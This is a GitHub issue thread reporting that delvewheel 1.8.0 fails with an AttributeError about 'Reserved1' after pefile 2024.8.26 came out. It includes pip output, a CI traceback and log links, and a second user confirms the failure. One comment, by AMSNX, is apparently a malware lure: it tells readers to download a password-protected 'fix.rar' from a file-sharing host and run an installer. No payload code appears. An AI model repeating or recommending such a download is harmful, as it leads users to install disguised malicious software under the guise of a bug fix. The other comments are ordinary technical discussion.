### ISSUE TITLE
delvewheel breaks with latest update to pefile 2024.8.26

### ISSUE THREAD

**Issue by juliannguyen4** [adang1345/delvewheel#56]
```bash
  + pip install delvewheel
  Collecting delvewheel
    Downloading delvewheel-1.8.0-py3-none-any.whl.metadata (16 kB)
  Collecting pefile (from delvewheel)
    Downloading pefile-2024.8.26-py3-none-any.whl.metadata (1.4 kB)
  Downloading delvewheel-1.8.0-py3-none-any.whl (56 kB)
  Downloading pefile-2024.8.26-py3-none-any.whl (74 kB)
  Installing collected packages: pefile, delvewheel
  Successfully installed delvewheel-1.8.0 pefile-2024.8.26
```
```python
...
  + delvewheel repair --add-path ./aerospike-client-c/vs/x64/Release -w C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\repaired_wheel C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\built_wheel\aerospike-15.0.1rc4-cp39-cp39-win_amd64.whl
 Traceback (most recent call last):
    File "C:\Users\runneradmin\AppData\Local\pypa\cibuildwheel\Cache\nuget-cpython\python.3.9.13\tools\lib\runpy.py", line 197, in _run_module_as_main
      return _run_code(code, main_globals, None,
    File "C:\Users\runneradmin\AppData\Local\pypa\cibuildwheel\Cache\nuget-cpython\python.3.9.13\tools\lib\runpy.py", line 87, in _run_code
      exec(code, run_globals)
    File "C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\build\venv\Scripts\delvewheel.exe\__main__.py", line 7, in <module>
    File "C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\build\venv\lib\site-packages\delvewheel\__main__.py", line 86, in main
      wr.repair(args.target, no_mangles, args.no_mangle_all, args.strip, args.lib_sdir, not args.no_diagnostic and 'SOURCE_DATE_EPOCH' not in os.environ, namespace_pkgs, args.include_symbols, args.include_imports)
    File "C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\build\venv\lib\site-packages\delvewheel\_wheel_repair.py", line 860, in repair
      _dll_utils.replace_needed(extension_module_path, needed, name_mangler, strip, self._verbose, self._test)
    File "C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\build\venv\lib\site-packages\delvewheel\_dll_utils.py", line 724, in replace_needed
      if hasattr(pe, 'DIRECTORY_ENTRY_LOAD_CONFIG') and pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.Reserved1:
  AttributeError: 'Structure' object has no attribute 'Reserved1'
  repairing C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\built_wheel\aerospike-15.0.1rc4-cp39-cp39-win_amd64.whl
  finding DLL dependencies
  copying DLLs into aerospike-15.0.1rc4.data\platlib
  mangling DLL names
  Error: Command delvewheel repair --add-path ./aerospike-client-c/vs/x64/Release -w C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\repaired_wheel C:\Users\runneradmin\AppData\Local\Temp\cibw-run-p8ng6gk2\cp39-win_amd64\built_wheel\aerospike-15.0.1rc4-cp39-cp39-win_amd64.whl failed with code 1. 
```
Full logs: https://github.com/aerospike/aerospike-client-python/actions/runs/10567208322/job/29277410237#step:15:16115

This did not happen with the previous version of pefile (2023.2.7): https://github.com/aerospike/aerospike-client-python/actions/runs/10566984548/job/29274982819#step:15:294

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sameeul** [comment]
Confirming that we also experienced it in our CI with the new version of delvewheel.

https://productionresultssa19.blob.core.windows.net/actions-results/447c38d5-6f4b-4daf-bf05-eaf4ab254399/workflow-job-run-9ea3fcc8-ced6-58ed-46bd-5cc82486ba70/logs/job/job-logs.txt?rsct=text%2Fplain&se=2024-08-27T04%3A06%3A08Z&sig=ocW2EWULskqUfuPQlhvbufEHW4sO4eCNILqHcFlUOoM%3D&ske=2024-08-27T12%3A55%3A36Z&skoid=ca7593d4-ee42-46cd-af88-8b886a2f84eb&sks=b&skt=2024-08-27T00%3A55%3A36Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2024-05-04&sp=r&spr=https&sr=b&st=2024-08-27T03%3A56%3A03Z&sv=2024-05-04
